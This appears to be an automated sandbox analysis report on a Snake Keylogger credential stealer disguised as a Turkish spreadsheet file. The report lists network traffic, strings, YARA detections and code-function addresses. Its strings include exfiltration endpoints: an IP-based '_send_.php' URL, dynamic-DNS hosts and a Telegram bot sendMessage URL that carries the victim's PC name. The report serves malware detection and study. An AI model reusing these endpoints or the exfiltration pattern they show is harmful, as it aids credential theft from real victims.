Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000A.00000002.1419410557.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003198000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003189000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003073000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003193000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_031DD55C 0_2_031DD55C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DCA490 0_2_07DCA490
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC0040 0_2_07DC0040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC8ED0 0_2_07DC8ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC6980 0_2_07DC6980
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC54B0 0_2_07DC54B0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC3458 0_2_07DC3458
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC3448 0_2_07DC3448
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC0007 0_2_07DC0007
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC3020 0_2_07DC3020
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC2BE8 0_2_07DC2BE8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_07DC4B00 0_2_07DC4B00
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133C146 9_2_0133C146
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133D283 9_2_0133D283
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133C473 9_2_0133C473
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133C738 9_2_0133C738
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_013369AB 9_2_013369AB
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133E988 9_2_0133E988
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133CA13 9_2_0133CA13
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01333AA1 9_2_01333AA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133CCDF 9_2_0133CCDF
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133CFA9 9_2_0133CFA9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01336FC8 9_2_01336FC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01333E09 9_2_01333E09
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01335377 9_2_01335377
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133F631 9_2_0133F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133E97B 9_2_0133E97B
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_013339EE 9_2_013339EE
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_013329EC 9_2_013329EC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0133FA88 9_2_0133FA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_0102D55C 10_2_0102D55C
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_051E6A48 10_2_051E6A48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_051E0006 10_2_051E0006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_051E0040 10_2_051E0040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_051E6A38 10_2_051E6A38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B9718 10_2_071B9718
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B8148 10_2_071B8148
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B6800 10_2_071B6800
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B0040 10_2_071B0040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B3458 10_2_071B3458
